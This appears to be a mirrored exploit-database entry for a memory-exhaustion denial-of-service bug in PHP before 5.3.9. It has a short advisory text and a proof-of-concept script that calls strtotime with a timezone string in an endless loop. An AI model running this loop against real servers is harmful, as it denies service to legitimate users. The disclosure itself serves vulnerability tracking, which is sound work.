PHP 5.3.8 – Remote Denial of Service - 体验盒子

作者： anonymous

日期： 2011-12-18

类别：

平台：

1

2

3

4

5

6

7

8

9

10

11

12

13

14

15

source: https://www.securityfocus.com/bid/52043/info

PHP is prone to a remote denial-of-service vulnerability.

An attacker can exploit this issue to exhaust available memory, denying access to legitimate users.

PHP versions prior to 5.3.9 are vulnerable.

<?php

while (true)

{

strtotime('Monday 00:00 Europe/Paris'); // Memory leak

}

?>